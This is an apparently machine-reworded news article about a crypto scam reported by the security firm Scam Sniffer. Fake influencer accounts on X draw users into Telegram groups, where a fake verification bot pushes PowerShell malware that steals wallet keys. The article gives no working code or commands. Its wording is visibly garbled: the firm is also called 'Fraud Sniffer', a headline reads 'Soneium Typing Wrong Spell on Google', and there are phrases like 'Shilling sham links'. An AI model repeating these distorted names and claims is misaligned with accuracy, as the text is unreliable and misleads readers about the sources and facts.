Fraudsters are using Telegram verification bots to inject crypto-stealing malware.
Scammers are using a combination of social engineering and Telegram verification bots to inject crypto-stealing malware into systems to attack crypto wallets, blockchain security firm Scam Sniffer has warned.
In a December 10 X post, Scam Sniffer scammers are creating fake X accounts impersonating popular crypto influencers, then inviting users to Telegram groups for investment insights.
Once in a Telegram group, users are asked to authenticate via “OfficiaISAsafeguardBot,” a fake authentication bot that “creates an artificial sense of urgency” with short authentication windows, the company said.
Scammers impersonate well-known crypto influencers on X and then invite users to malicious Telegram groups. Source: Fraud Sniffer
The bot injects malicious PowerShell code that downloads and executes malware to target computer systems and wallets. Scam Sniffer says it has seen “several cases” of similar malware stealing private keys.
Scam Sniffer told Cointelegraph that the most recent known cases of this type of scam were all caused by fake authentication bots.
“It is currently unclear whether other malicious bots exist. However, it is clear that it is easy for them to imitate others as well,” the organization said.
According to Scam Sniffer, malware that targets regular users has “been around for a long time,” but the infrastructure behind such malicious software is “evolving rapidly” and becoming “more sophisticated.”
When scammers have successful heists and demand grows, they turn to scams-as-a-service, just as crypto wallet-draining software makers hire their tools for scammers.
“This is the first time we've seen this unique combination of fake X-accounts, fake Telegram channels and malicious Telegram bots,” he said, noting that fraudsters are seeing malware spread through Telegram and fraudsters impersonating others to run malicious code.
All recent and known cases of this type of fraud are caused by the fake SafeGuard bot. Source: Fraud Sniffer
Meanwhile, the security firm pointed out that fraudsters are on the rise with X and Shilling sham links and tokens impersonating others.
On average, Scam Sniffer's monitoring system detected an average of 300 X scammers per day this month, compared to an average of 160 in November.
At least two victims lost more than $3 million by clicking on malicious links and signing transactions from these fake accounts, he added.
Related: Soneium Typing Wrong Spell on Google Can Destroy Your Crypto Wallet: Scam Sniffer
Kado Security Labs also sounded the alarm that Web3 employees are being targeted in a campaign to inject malware and use fake harvesting apps to steal data on websites, applications and crypto wallets.
Web3 security platform Cybers similarly warned this month that phishing attacks could increase in December as hackers try to take advantage of the boom in online transactions ahead of the holiday season.
Magazine: How to pick a winner in this bull run: Web3 Gamer
